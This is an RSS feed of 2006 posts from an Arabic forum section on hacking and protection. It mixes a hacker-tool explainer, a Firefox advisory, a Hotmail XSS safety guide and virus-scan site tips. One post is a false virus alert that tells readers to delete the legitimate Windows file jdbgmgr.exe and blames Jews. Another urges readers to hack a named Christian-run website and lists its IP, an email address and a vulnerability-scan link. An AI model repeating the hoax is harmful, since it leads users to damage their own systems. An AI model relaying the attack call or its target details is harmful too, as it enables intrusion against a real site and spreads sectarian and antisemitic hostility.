Hackers Utility 
برنامج مفيد ورهيب للهاكرز وخاصة المبتدئين والمحترفين حيث أنه يمتلك أغلب وأفضل إمكانيات مختلف برامج الهاكرز ويمكن من خلاله كسر الكلمات السرية للملفات المضغوطة وفك تشفير الملفات السرية المشفرة وكذلك تحويل عناوين المواقع الى أرقام آي بي والعكس كما به العديد العديد من الإمكانيات والمميزات التي يبحث عنها الكثير من الهاكرز ..


وان شالله الكل يحمي نفسه من الهكرز وانا اول واحد حامي نفسي لاني تعقدت منهم اخووكم من الكويت تل ابيب دمـ العيون ــع :)

أرجــوو التثبيــت للأفااده للكــل والحماايــه</description>
			<content:encoded><![CDATA[<div>ما هي عملية الهاكينج أو التجسس ؟ <br />
من هم الهاكرز ؟ <br />
ما هي الأشياء التي تساعدهم على اختراق جهازك ؟ <br />
كيف يتمكن الهاكر من الدخول إلى جهازك ؟ <br />
كيف يتمكن الهاكر من الدخول إلى جهاز كمبيوتر بعينه ؟ <br />
ما هو رقم الآي بي أدرس ؟ <br />
كيف يصاب جهازك بملف الباتش أو التروجان أو حتى الفيروسات ؟ <br />
كيف يختار الهاكر الجهاز الذي يود اختراقه ؟ <br />
ما هي أشهر برامج الهاكرز ؟ <br />
كيف تعرف إذا كان جهازك مخترقاً أم لا ؟ <br />
ما هي أهم الاحتياطات التي يجب اتخاذها للحماية من الهاكرز ؟ <br />
ما هي أهم الأشياء التي يبحث عنها الهاكرز ؟ <br />
ما هي أشهر طريقة للكشف عن ملفات التجسس ؟ <br />
مواقف مع الهاكرز .. <br />
<br />
تسمى باللغة الإنجليزية (Haking) .. وتسمى باللغة العربية عملية التجسس أو الاختراق .. <br />
حيث يقوم أحد الأشخاص الغير مصرح لهم بالدخول إلى نظام التشغيل في جهازك بطريقة غير شرعية ولأغراض غير سوية مثل التجسس أو السرقة أو التخريب حيث يتاح للشخص المتجسس (الهاكر) أن ينقل أو يمسح أو يضيف ملفات أو برامج كما أنه بإمكانه أن يتحكم في نظام التشغيل فيقوم بإصدار أوامر مثل إعطاء أمر الطباعة أو التصوير أو التخزين .. <br />
<br />
<br />
من هم الهاكرز ؟ <br />
هم الأشخاص الذين يخترقون جهازك فيستطيعون مشاهدة ما به من ملفات أو سرقتها أو تدمير جهازك أو التلصص ومشاهدة ما تفعله على شبكة الإنترنت .. <br />
<br />
ما هي الأشياء التي تساعدهم على اختراق جهازك ؟ <br />
1- وجود ملف باتش أو تروجان <br />
لا يستطيع الهاكر الدخول إلى جهازك إلا مع وجود ملف يسمى ( patch ) أو (trojan ) في جهازك وهذه الملفات هي التي يستطيع الهاكر بواسطتها الدخول إلى جهازك الشخصي حيث يستخدم الهاكر أحد برامج التجسس التي ترتبط مع ملف الباتش الذي يعمل ك (ريسيفر) يستطيع أن يضع له الهاكر ( إسم مستخدم ) و ( رمز سري ) تخوله أن يكون هو الشخص الوحيد الذي يستطيع الدخول إلى جهازك وكذلك يستطيع أن يجعل جهازك مفتوحاً فيستطيع أي هاكر أن يدخل إلى جهازك !! <br />
<br />
2- الاتصال بشبكة الإنترنت <br />
<br />
لا يستطيع الهاكر أن يدخل إلى جهازك إلا إذا كنت متصلاً بشبكة الإنترنت أما إذا كان جهازك غير متصل بشبكة الإنترنت أو أي شبكة أخرى فمن المستحيل أن يدخل أحد إلى جهازك سواك !! <br />
ولذللك إذا أحسست بوجود هاكر في جهازك فسارع إلى قطع الاتصال بخط الإنترنت بسرعة حتى تمنع الهاكر من مواصلة العبث والتلصص في جهازك .. <br />
<br />
<br />
3- برنامج التجسس <br />
<br />
حتى يتمكن الهاكر العادي من اختراق جهازك لابد أن يتوافر معه برنامج يساعده على الاختراق ! <br />
<br />
ومن أشهر برامج الهاكرز هذه البرامج : <br />
<br />
Web Cracker 4 <br />
Net Buster <br />
NetBus Haxporg <br />
Net Bus 1.7 <br />
Girl Friend <br />
BusScong <br />
BO Client and Server <br />
Hackers Utility <br />
كيف يتمكن الهاكر من الدخول إلى جهازك ؟ <br />
عندما يتعرض جهاز الكمبيوتر للإصابة بملف التجسس وهو ( الباتش أو التروجان ) فإنه على الفور يقوم بفتح بورت ( port ) أو منفذ داخل جهازك فيستطيع كل من لديه برنامج تجسس أن يقتحم جهازك من خلال هذا الملف الذي يقوم بفتح منطقة أشبه بالنافذة السرية التي يدخل منها اللصوص وهم الهاكرز !! <br />
<br />
كيف يتمكن الهاكر من الدخول إلى جهاز كمبيوتر بعينه ؟ <br />
لا يستطيع الهاكر أن يخترق جهاز كمبيوتر بعينه إلا إذا توافرت عدة شروط أساسية وهي : <br />
1- إذا كان هذا الكمبيوتر يحوي ملف التجسس ( الباتش ) . <br />
<br />
2- إذا كان الهاكر يعرف رقم الآي بي أدرس الخاص بهذا الشخص .. <br />
<br />
وطبعاً لابد من وجود الشروط الأخرى وهي اتصال الضحية بالإنترنت ومعرفة الهاكر بكيفية استخدام برنامج التجسس والاختراق من خلاله ! <br />
<br />
بمعنى آخر إذا كان جهاز الكمبيوتر سليماً ولا يحوي أي ملفات باتش فمن المستحيل أن يدخل عليه أي هاكر عادي حتى لو كان يعرف رقم الآي بي أدرس ما عدا المحترفين فقط وهم قادرون على الدخول بأية طريقة وتحت أي مانع ولديهم طرقهم السرية في الولوج إلى مختلف الأنظمة !! <br />
<br />
وإذا كان الهاكر لا يعرف رقم الآي بي أدرس الخاص بك فإنه لن يستطيع الدخول إلى جهازك حتى لو كان جهازك يحوي ملف الباتش ! <br />
<br />
<br />
ما هو رقم الآي بي أدرس ؟ <br />
هو العنوان الخاص بكل مستخدم لشبكة الإنترنت أي أنه الرقم الذي يُعَّرف مكان الكمبيوتر أثناء تصفح شبكة الإنترنت وهو يتكون من 4 أرقام وكل جزء منها يشير إلى عنوان معين فأحدها يشير إلى عنوان البلد والتالي يشير إلى عنوان الشركة الموزعة والثالث إلى المؤسسة المستخدمة والرابع هو المستخدم .. <br />
ورقم الآي بي متغير وغير ثابت فهو يتغير مع كل دخول إلى الإنترنت .. بمعنى آخر لنفرض أنك اتصلت بالانترنت ونظرت إلى رقم الآى بي الخاص بك فوجدت أنه : <br />
212.123.123.200 <br />
<br />
ثم خرجت من الانترنت أو أقفلت الاتصال ثم عاودت الاتصال بعد عدة دقائق فإن الرقم يتغير ليصبح كالتالي : <br />
<br />
212.123.123.366 <br />
<br />
لاحظ التغير في الأرقام الأخيرة : الرقم 200 أصبح 366 . <br />
<br />
ولذلك ينصح بعدم استخدام بعرض برامج المحادثة مثل (الآيسكيو ICQ) لأنه يقوم بإظهار رقم الآي بي بشكل دائم حتى مع إخفائه فيتمكن الهاكر من استخدامه في الدخول إلى جهاز الشخص المطلوب مع توافر شرط وهو أن يحتوي كمبيوتر هذا الشخص على منفذ أو ملف تجسس ( باتش ) !! <br />
<br />
<br />
كيف يصاب جهازك بملف الباتش أو التروجان أو حتى الفيروسات ؟ <br />
الطريقة الأولى : <br />
أن يصلك ملف التجسس من خلال شخص عبر المحادثة أو ( الشات ) وهي أن يرسل أحد الهاكر لك صورة أو ملف يحتوي على الباتش أو التروجان ! <br />
ولابد أن تعلم صديقي العزيز أنه بإمكان الهاكر أن يغرز الباتش في صورة أو ملف فلا تستطيع معرفته إلا باستخدام برنامج كشف الباتش أو الفيروسات حيث تشاهد الصورة أو الملف بشكل طبيعي ولا تعلم أنه يحتوي على باتش أو فيروس ربما يجعل جهازك عبارة عن شوارع يدخلها الهاكر والمتطفلون ! <br />
<br />
الطريقة الثانية : <br />
<br />
أن يصلك الباتش من خلال رسالة عبر البريد الإلكتروني لا تعلم مصدر الرسالة ولا تعلم ماهية الشخص المرسل فتقوم بتنزيل الملف المرفق مع الرسالة ومن ثم فتحه وأنت لا تعلم أنه سيجعل الجميع يدخلون إلى جهازك ويتطفلون عليك .. <br />
<br />
الطريقة الثالثة : <br />
<br />
إنزال برامج أو ملفات من مواقع مشبوهة مثل المواقع الجنسية أو المواقع التي تساعد على تعليم التجسس ! <br />
<br />
الطريقة الرابعة : <br />
<br />
الدخول إلى مواقع مشبوهة مثل المواقع الجنسية حيث أنه بمجرد دخولك إلى الموقع فإنه يتم تنزيل الملف في جهازك بواسطة كوكيز لا تدري عنها !! <br />
حيث يقوم أصحاب مثل هذه المواقع بتفخيخ الصفحات فعندما يرغب أحد الزوار في الدخول إلى هذه الصفحات تقوم صفحات الموقع بإصدار أمر بتنزيل ملف التجسس في جهازك ! <br />
<br />
<br />
كيف يختار الهاكر الجهاز الذي يود اختراقه ؟ <br />
بشكل عام لا يستطيع الهاكر العادي من اختيار كمبيوتر بعينه لاختراقه إلا إذا كان يعرف رقم الآي بي أدرس الخاص به كما ذكرنا سابقاً فإنه يقوم بإدخال رقم الآي بي أدرس الخاص بكمبيوتر الضحية في برنامج التجسس ومن ثم إصدار أمر الدخول إلى الجهاز المطلوب !! <br />
وأغلب المخترقين يقومون باستخدام برنامج مثل ( IP Scan ) أو كاشف رقم الآي بي وهو برنامج يقوم الهاكر باستخدامه للحصول على أرقام الآي بي التي تتعلق بالأجهزة المضروبة التي تحتوي على ملف التجسس ( الباتش ) ! <br />
<br />
يتم تشغيل البرنامج ثم يقوم المخترق بوضع أرقام آي بي افتراضيه .. أي أنه يقوم بوضع رقمين مختلفين فيطلب من الجهاز البحث بينهما فمثلاً يختار هذين الرقمين : <br />
<br />
212.224.123.10 <br />
<br />
212.224.123.100 <br />
<br />
لاحظ آخر رقمين وهما : 10 و 100 <br />
<br />
فيطلب منه البحث عن كمبيوتر يحوي منفذ ( كمبيوتر مضروب ) بين أجهزة الكمبيوتر الموجودة بين رقمي الآي بي أدرس التاليين : 212.224.123.10 و 212.224.123.100 <br />
وهي الأجهزة التي طلب منه الهاكر البحث بينها ! <br />
<br />
بعدها يقوم البرنامج بإعطائه رقم الآي بي الخاص بأي كمبيوتر مضروب يقع ضمن النطاق الذي تم تحديده مثل : <br />
<br />
212.224.123.50 <br />
<br />
212.224.123.98 <br />
<br />
212.224.123.33 <br />
<br />
212.224.123.47 <br />
<br />
فيخبره أن هذه هي أرقام الآي بي الخاصة بالأجهزة المضروبة التي تحوي منافذ أو ملفات تجسس فيستطيع الهاكر بعدها من أخذ رقم الآي بي ووضعه في برنامج التجسس ومن ثم الدخول إلى الأجهزة المضروبة ! <br />
<br />
ما هي أشهر برامج الهاكرز ؟ <br />
<br />
netbus1.70 <br />
من أقدم البرامج في ساحة الاختراق بالسيرفرات وهو الأكثر شيوعا بين مستخدمي المايكروسوفت شات وهو برنامج به العديد من الإمكانيات التي تمكن الهاكر من التحكم بجهاز الضحية وتوجد نسخ مختلفة أكثر حداثة من النت باس وكل نسخى منها أكثر تطوراً من الأخرى .. <br />
<br />
SUB 7 <br />
برنامج ممتاز وغني عن التعريف .. تستطيع التحكم وتنسيق السيرفر ليعمل كيفما تشاء سواء من تغيير شكل او طريقة عمل وهو ممتاز في مجال الاختراق بالبرامج .. <br />
<br />
Hackers Utility <br />
برنامج مفيد ورهيب للهاكرز وخاصة المبتدئين والمحترفين حيث أنه يمتلك أغلب وأفضل إمكانيات مختلف برامج الهاكرز ويمكن من خلاله كسر الكلمات السرية للملفات المضغوطة وفك تشفير الملفات السرية المشفرة وكذلك تحويل عناوين المواقع الى أرقام آي بي والعكس كما به العديد العديد من الإمكانيات والمميزات التي يبحث عنها الكثير من الهاكرز ..<br />
<br />
<br />
وان شالله الكل يحمي نفسه من الهكرز وانا اول واحد حامي نفسي لاني تعقدت منهم اخووكم من الكويت تل ابيب دمـ العيون ــع :)<br />
<br />
أرجــوو التثبيــت للأفااده للكــل والحماايــه</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>دمـ العيون ـع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=28092</guid>
		</item>
		<item>
			<title>هذا البرنامج لمن لا يعرف الاى بي الخاص به !</title>
			<link>https://kwety.net/vb/showthread.php?t=27656&amp;goto=newpost</link>
			<pubDate>Sun, 13 Aug 2006 10:33:00 GMT</pubDate>
			<description>حمل هذا البرنامج الصغير ان كنت ما تعرف الاى بي الخاص بك .
البرنامج بالمرفقات :</description>
			<content:encoded><![CDATA[<div>حمل هذا البرنامج الصغير ان كنت ما تعرف الاى بي الخاص بك .<br />
البرنامج بالمرفقات :</div>


	<br />
	<div style="padding:6px">

	

	

	

	
		<fieldset class="fieldset">
			<legend>الملفات المرفقة</legend>
			<table cellpadding="0" cellspacing="3" border="0">
			<tr><td dir="rtl">
	<table border="0" cellpadding="0" width="100%" bordercolor="#444" id="table2" dir="rtl">
		<tr>
			<td><img border="0" class="inlineimg" src="https://kwety.net/vb/5star/attach/zip.gif" alt="&lt;phrase 1=&quot;zip&quot;&gt;نوع الملف: %1$s&lt;/phrase&gt;" width="16" height="16">
	<a href="https://kwety.net/vb/attachment.php?attachmentid=5193" target="_blank">
BRNAMG AP.zip&rlm;</a>&nbsp;&nbsp;
<input type="text" name="T2" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value=" حجم الملف :  124 بايت">
<input type="text" name="T1" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value="المشاهدات غير معروف">&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;</td>
		</tr>
	</table>
			</table>
		</fieldset>
	

	</div>
]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ebjad</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=27656</guid>
		</item>
		<item>
			<title>حركه مفيده للكمبيوتر</title>
			<link>https://kwety.net/vb/showthread.php?t=27631&amp;goto=newpost</link>
			<pubDate>Sun, 13 Aug 2006 05:17:44 GMT</pubDate>
			<description>الكثير منّا عند عمله على الحاسب يشعر بالتعب وخاصه في 

الفتره الطويله ومن خلال تركيزه على الكلمات حتى النظر يتعب 

وتصبح الكتابه مشوشه تقريبا وهذه الحركه ممكن تفيدنا وخاصه

لأصحاب النظر الضعيف بتكبير الكتابه للتكبير أضغط ctrl بصوره مستمره

وعن طريق سكرول الماوس نكبر ونصغر بالحجم المراد في أي صفحه 

ممكن الكثير يعرف هذه الحركه ولكن أيضا يوجد بعض الأخوه لايعرفونها

وشكرا لسعة صدركم 
</description>
			<content:encoded><![CDATA[<div><div align="center">الكثير منّا عند عمله على الحاسب يشعر بالتعب وخاصه في <br />
<br />
الفتره الطويله ومن خلال تركيزه على الكلمات حتى النظر يتعب <br />
<br />
وتصبح الكتابه مشوشه تقريبا وهذه الحركه ممكن تفيدنا وخاصه<br />
<br />
لأصحاب النظر الضعيف بتكبير الكتابه للتكبير أضغط ctrl بصوره مستمره<br />
<br />
وعن طريق سكرول الماوس نكبر ونصغر بالحجم المراد في أي صفحه <br />
<br />
ممكن الكثير يعرف هذه الحركه ولكن أيضا يوجد بعض الأخوه لايعرفونها<br />
<br />
وشكرا لسعة صدركم </div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=27631</guid>
		</item>
		<item>
			<title>هاااااااااااااام جدااااااااا اخطر فايروس وطريقة حذفه</title>
			<link>https://kwety.net/vb/showthread.php?t=27630&amp;goto=newpost</link>
			<pubDate>Sun, 13 Aug 2006 05:11:24 GMT</pubDate>
			<description>السلام عليكم ورحمة الله وبركاته
 صورة: http://www.kwety.net/kwety1/q89/36_7_13.gif 

قبل 48 ساعة قام مجموعه
من المبرمجين اليهود بإنتاج فايروس جديد
أخطر من فايروس
بلاستر
ويقوم الفايروس بتحميل نفسه
على جميع أنظمة الوندوز
وهو فايروس موجه للإيميلات
العربية والعرب على وجه الخصوص
وسيقوم الفايروس
بتدمير الهارد وير بدأ من تاريخ 20-2-2006
للتخلص من الفايروس:
أذهب إلى أبدا ثم بحث في الملفات والمجلدات ثم ضع اسم الفايروس
وهو
jdbgmgr.exe
وسيظهر لك الفايروس
على شكل دب لاتفتح الفايروس ولكن سويله حذف عادي كأنك تحذف ملف .
أبحث في جهازك الآن

لقد قمت بالتجربه وانصح الجميع بالبحث والتجربه

تقبلوا تحياتي صورة: http://www.kwety.net/kwety1/q89/36_3_14.gif 
</description>
			<content:encoded><![CDATA[<div><div align="center">السلام عليكم ورحمة الله وبركاته<br />
 <img src="http://www.kwety.net/kwety1/q89/36_7_13.gif" border="0" alt="" /><br />
<br />
قبل 48 ساعة قام مجموعه<br />
من المبرمجين اليهود بإنتاج فايروس جديد<br />
أخطر من فايروس<br />
بلاستر<br />
ويقوم الفايروس بتحميل نفسه<br />
على جميع أنظمة الوندوز<br />
وهو فايروس موجه للإيميلات<br />
العربية والعرب على وجه الخصوص<br />
وسيقوم الفايروس<br />
بتدمير الهارد وير بدأ من تاريخ 20-2-2006<br />
للتخلص من الفايروس:<br />
أذهب إلى أبدا ثم بحث في الملفات والمجلدات ثم ضع اسم الفايروس<br />
وهو<br />
jdbgmgr.exe<br />
وسيظهر لك الفايروس<br />
على شكل دب لاتفتح الفايروس ولكن سويله حذف عادي كأنك تحذف ملف .<br />
أبحث في جهازك الآن<br />
<br />
لقد قمت بالتجربه وانصح الجميع بالبحث والتجربه<br />
<br />
تقبلوا تحياتي <img src="http://www.kwety.net/kwety1/q89/36_3_14.gif" border="0" alt="" /></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=27630</guid>
		</item>
		<item>
			<title>طريقة حماية ايميلك من الثغرة القاتلة الجديدة بالهوتميل .</title>
			<link>https://kwety.net/vb/showthread.php?t=27397&amp;goto=newpost</link>
			<pubDate>Wed, 09 Aug 2006 03:56:57 GMT</pubDate>
			<description>السلام عليكم ورحمة الله

الكل يعلم ان هناك ثغرة في الهوتميل( فقط الهوتميل العربي ) تستغل عن طريق المتصفح ليتم بها سرقة ايميلك .

الثغرة من نوع : Xss

مع العلم ان هذه الطريقة تحميك فقط من الرسائل التي تصلك ويوجد بها روابط مشبوهة اما الروابط التي تضغط عليها في الماسنجر فهي لا تفيدك ( لا تضغط على اي رابط مشبوه ) .

بالبداية ادخل الى ايميلك بالهوتميل , ومن ثم ادخل للخيارات :

صورة: http://www.kwety.net/kwety1/q89/1e76d8ff69111.jpg 

ستظهر لك عدة خيارات اختر منها الخيار الثاني :

صورة: http://www.kwety.net/kwety1/q89/4cd6968363222.jpg 

بعدها اذهب الى الخيار الاخير وفعل الخيار الاول كما هو موضح ( تنبيه للرسائل المشبوهة ) :

صورة: http://www.kwety.net/kwety1/q89/699b85a920333.jpg 

واكرر يا اخوان الطريقة لا تنفع لمن يضغط على الروابط بالماسنجر لان هذه تحميك فقط من الرسائل على الانبوكس .

حماكم الله من اطفال النت .

منقول للفائده</description>
			<content:encoded><![CDATA[<div>السلام عليكم ورحمة الله<br />
<br />
الكل يعلم ان هناك ثغرة في الهوتميل( فقط الهوتميل العربي ) تستغل عن طريق المتصفح ليتم بها سرقة ايميلك .<br />
<br />
الثغرة من نوع : Xss<br />
<br />
مع العلم ان هذه الطريقة تحميك فقط من الرسائل التي تصلك ويوجد بها روابط مشبوهة اما الروابط التي تضغط عليها في الماسنجر فهي لا تفيدك ( لا تضغط على اي رابط مشبوه ) .<br />
<br />
بالبداية ادخل الى ايميلك بالهوتميل , ومن ثم ادخل للخيارات :<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/1e76d8ff69111.jpg" border="0" alt="" /><br />
<br />
ستظهر لك عدة خيارات اختر منها الخيار الثاني :<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/4cd6968363222.jpg" border="0" alt="" /><br />
<br />
بعدها اذهب الى الخيار الاخير وفعل الخيار الاول كما هو موضح ( تنبيه للرسائل المشبوهة ) :<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/699b85a920333.jpg" border="0" alt="" /><br />
<br />
واكرر يا اخوان الطريقة لا تنفع لمن يضغط على الروابط بالماسنجر لان هذه تحميك فقط من الرسائل على الانبوكس .<br />
<br />
<font color="Red">حماكم الله من اطفال النت .</font><br />
<br />
منقول للفائده</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=27397</guid>
		</item>
		<item>
			<title><![CDATA[إلى جميع المسلمين >>>]]></title>
			<link>https://kwety.net/vb/showthread.php?t=27032&amp;goto=newpost</link>
			<pubDate>Fri, 04 Aug 2006 09:23:47 GMT</pubDate>
			<description><![CDATA[[GRADE="0000FF FF6347 32CD32 FF1493"]بسم الله الرحمن الرحيم
إلى جميع المسلمين ,,,, أرجو منكم التكرم بلحظات من وقتكم لأن القضيه ليست بالأمر الهين
 
    قام بعض المسيحيون في كنيسه تقع في شرم الشيخ مع بعض المسلمين السفلاء المنحطين بتصميم موقع عربي يضم فيه تسجيلات ومرئيات وصور تسئ للرسول صلى الله عليه وسلم وقد تم نشر هذا الموقع الفاسد في منتديات الهكرز والكراكرز لكي يتم تدميره في أسرع وقت ممكن 
 
وأطلب منكم نشر هذه الرساله الى جميع المسلمين لكي يأخذوا الحذر من هذا الموقع الفاسد
 
رابط الموقع الفاسد
http://www.aldalil-walborhan.com/
 
بعض المعلومات عن الموقع لتساعد على اختراقه لمن يستطيع ذلك
IP : 209.200.1.146
email:ado1953@hotmail.com
جميع ثغرات هذا الموقع هنا: http://sara001.free.fr/scan.htm
 
ولا تبخلوا أبدا بنشر الرساله .. حتى لا يبخل الرسول صلى الله عليه وسلم  عليكم بشفاعته يوم لا ضل الا ضله 
وقد عملتم على الجهاد والدفاع عن الدين [/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">[GRADE=&quot;0000FF FF6347 32CD32 FF1493&quot;]بسم الله الرحمن الرحيم<br />
إلى جميع المسلمين ,,,, أرجو منكم التكرم بلحظات من وقتكم لأن القضيه ليست بالأمر الهين<br />
 <br />
    قام بعض المسيحيون في كنيسه تقع في شرم الشيخ مع بعض المسلمين السفلاء المنحطين بتصميم موقع عربي يضم فيه تسجيلات ومرئيات وصور تسئ للرسول صلى الله عليه وسلم وقد تم نشر هذا الموقع الفاسد في منتديات الهكرز والكراكرز لكي يتم تدميره في أسرع وقت ممكن <br />
 <br />
وأطلب منكم نشر هذه الرساله الى جميع المسلمين لكي يأخذوا الحذر من هذا الموقع الفاسد<br />
 <br />
رابط الموقع الفاسد<br />
<a href="http://www.aldalil-walborhan.com/" target="_blank">http://www.aldalil-walborhan.com/</a><br />
 <br />
بعض المعلومات عن الموقع لتساعد على اختراقه لمن يستطيع ذلك<br />
IP : 209.200.1.146<br />
email:ado1953@hotmail.com<br />
جميع ثغرات هذا الموقع هنا: <a href="http://sara001.free.fr/scan.htm" target="_blank">http://sara001.free.fr/scan.htm</a><br />
 <br />
ولا تبخلوا أبدا بنشر الرساله .. حتى لا يبخل الرسول صلى الله عليه وسلم  عليكم بشفاعته يوم لا ضل الا ضله <br />
وقد عملتم على الجهاد والدفاع عن الدين [/GRADE]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>أنـــــوسـه ^_^</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=27032</guid>
		</item>
		<item>
			<title>ثغرة أمنية جديدة وخطيرة في متصفح الإنترنت فايرفوكس</title>
			<link>https://kwety.net/vb/showthread.php?t=26856&amp;goto=newpost</link>
			<pubDate>Wed, 02 Aug 2006 05:21:34 GMT</pubDate>
			<description>25/07/2006م

تقييم الثغرة : خطير 
استغلال الثغرة عن بعد : نعم
استغلال الثغرة محلياً : نعم
تاريخ النشر : 25/7/2006م
باتش للثغرة : تحديث للنسخة 1.5.0.5 من فايرفوكس

** وصف تقني **
تم إكتشاف ثغرة جديدة خطيرة في متصفح الانترنت فايرفوكس ، يمكن من خلالها الهجوم على الكمبيوتر عن بعد والتحكم بالجهاز بشكل تام من خلال إرسال وتشغيل الأوامر المختلفة . وهذه الثغرة تصدر عند استبدال عنصر navigator قبل بدأ الجافا مما قد يؤدي إلى اختلال المتصفح وبالتالي تنفيذ أوامر خاصة وضعها المخترق ضمن الصفحة ، ويتمكن المهاجم من التحكم بكامل النظام بشكل سهل جداً وذلك من خلال استدراج الضحية لزيارة صفحة الموقع الملغومة 

تم التأكد من عمل هذه الثغرة مع متصفح فايرفوكس 1.5.0.4 على نظام التشغيل ويندوز إكس بي سيرفس باك 2 ومحمل عليه جميع باتشات الحماية .

** البرامج التي تحوي الثغرة **
متصفح فايرفوكس / جميع الإصدارات ما عدا الإصدار الجديد 1.5.0.5 بتاريخ 27/7/2006م

** الحل **
التحديث للنسخة الأخيرة 1.5.0.5 من فايرفوكس بتاريخ 27/7/2006م أو تعطيل الجافا في الإصدارات السابقة

** عرض فيديو لإثبات وجود الثغرة **
مرفق ملف فلاش يوضح كيف تم استغلال الثغرة وتشغيل برنامج الآلة الحاسبة على نظام ويندوز XP وسيرفس باك2

الرابط : 
http://members.abunawaf.com/abufaisa.../1/firefox.swf


(منقول من بريدي )</description>
			<content:encoded><![CDATA[<div>25/07/2006م<br />
<br />
تقييم الثغرة : خطير <br />
استغلال الثغرة عن بعد : نعم<br />
استغلال الثغرة محلياً : نعم<br />
تاريخ النشر : 25/7/2006م<br />
باتش للثغرة : تحديث للنسخة 1.5.0.5 من فايرفوكس<br />
<br />
** وصف تقني **<br />
تم إكتشاف ثغرة جديدة خطيرة في متصفح الانترنت فايرفوكس ، يمكن من خلالها الهجوم على الكمبيوتر عن بعد والتحكم بالجهاز بشكل تام من خلال إرسال وتشغيل الأوامر المختلفة . وهذه الثغرة تصدر عند استبدال عنصر navigator قبل بدأ الجافا مما قد يؤدي إلى اختلال المتصفح وبالتالي تنفيذ أوامر خاصة وضعها المخترق ضمن الصفحة ، ويتمكن المهاجم من التحكم بكامل النظام بشكل سهل جداً وذلك من خلال استدراج الضحية لزيارة صفحة الموقع الملغومة <br />
<br />
تم التأكد من عمل هذه الثغرة مع متصفح فايرفوكس 1.5.0.4 على نظام التشغيل ويندوز إكس بي سيرفس باك 2 ومحمل عليه جميع باتشات الحماية .<br />
<br />
** البرامج التي تحوي الثغرة **<br />
متصفح فايرفوكس / جميع الإصدارات ما عدا الإصدار الجديد 1.5.0.5 بتاريخ 27/7/2006م<br />
<br />
** الحل **<br />
التحديث للنسخة الأخيرة 1.5.0.5 من فايرفوكس بتاريخ 27/7/2006م أو تعطيل الجافا في الإصدارات السابقة<br />
<br />
** عرض فيديو لإثبات وجود الثغرة **<br />
مرفق ملف فلاش يوضح كيف تم استغلال الثغرة وتشغيل برنامج الآلة الحاسبة على نظام ويندوز XP وسيرفس باك2<br />
<br />
الرابط : <br />
<a href="http://members.abunawaf.com/abufaisa.../1/firefox.swf" target="_blank">http://members.abunawaf.com/abufaisa.../1/firefox.swf</a><br />
<br />
<br />
(منقول من بريدي )</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=26856</guid>
		</item>
		<item>
			<title>عندك ملف وشاك ان فيه فايروس او ملف تجسس؟؟؟ هنا الحل</title>
			<link>https://kwety.net/vb/showthread.php?t=26601&amp;goto=newpost</link>
			<pubDate>Sun, 30 Jul 2006 20:37:44 GMT</pubDate>
			<description><![CDATA[[FRAME="8 70"]السلام عليكم ورحمه الله وبركاته


الملفات ممكن تجينا من البريد او ممكن عن طريق شخص عبر الماسنجر او عن طريق موقع
ممكن تفحصه بجهازك ببرنامج مضاد للفيروسات 

لكن ممكن ما يكون عندك البرامج او ما سويت له تحديث او انك تشك بقدراته او انه لا يعمل لاي سبب كان
او من الممكن ان يكون الملف مشفر او مضغوط .. ثم تنطري عليه الحيله التي عملها الهكر ولا يصيده البرنامج او او

ولان بعض الفايروسات يصيدها برنامج بينما برنامج اخرى لا يستطيع اكتشافها وممكن يكون العكس
لان كل برنامج وله طريقه في اكتشاف الفيروسات

راح اضع موقعين وانصح بوضعهم في المفضلة لديكم لتستخدمها عند الحاجة 
طبعا بتعرفون ليه انصح بها !!


فكرة الموقعين : هي ان تقدر تعمل سكان وتحليل على ملف معين انت شاك فيه
وذلك عن طريق اكثر من 20 برنامج مضاد للفيروسات مثل الكاسبر و النورتن والنود والباندا و و
ويتم تحديث هذه البرامج كل ساعه 


الاول :

http://www.virustotal.com/en/indexf.html


هذا الموقع يستخدم البرامج التالية :

AntiVir 
Authentium 
Avast 
AVG 
BitDefender 
CAT-QuickHeal 
ClamAV 
DrWeb 
eTrust-InoculateIT 
eTrust-Vet 
Ewido 
Fortinet 
F-Prot 
F-Prot4 
Ikarus 
Kaspersky 
McAfee 
Microsoft 
NOD32v2 
Norman 
Panda 
Sophos 
Symantec 
TheHacker 
UNA 
VBA32 
VirusBuster 

--------------------------------------------

الثاني:



http://virusscan.jotti.org/


ويستخدم :
AntiVir 
ArcaVir 
Avast 
AVG Antivirus 
BitDefender 
ClamAV 
Dr.Web 
F-Prot Antivirus 
Fortinet 
Kaspersky Anti-Virus 
NOD32 
Norman Virus Control 
UNA 
VirusBuster 
VBA32 


ملاحظة: استخدموا الاثنين للاحتياط ,, فقد يكون موقع لديه اصدار احد البرامج اقدم من اصدار الموقع الاخر فيكون هناك اختلاف في النتائج

 
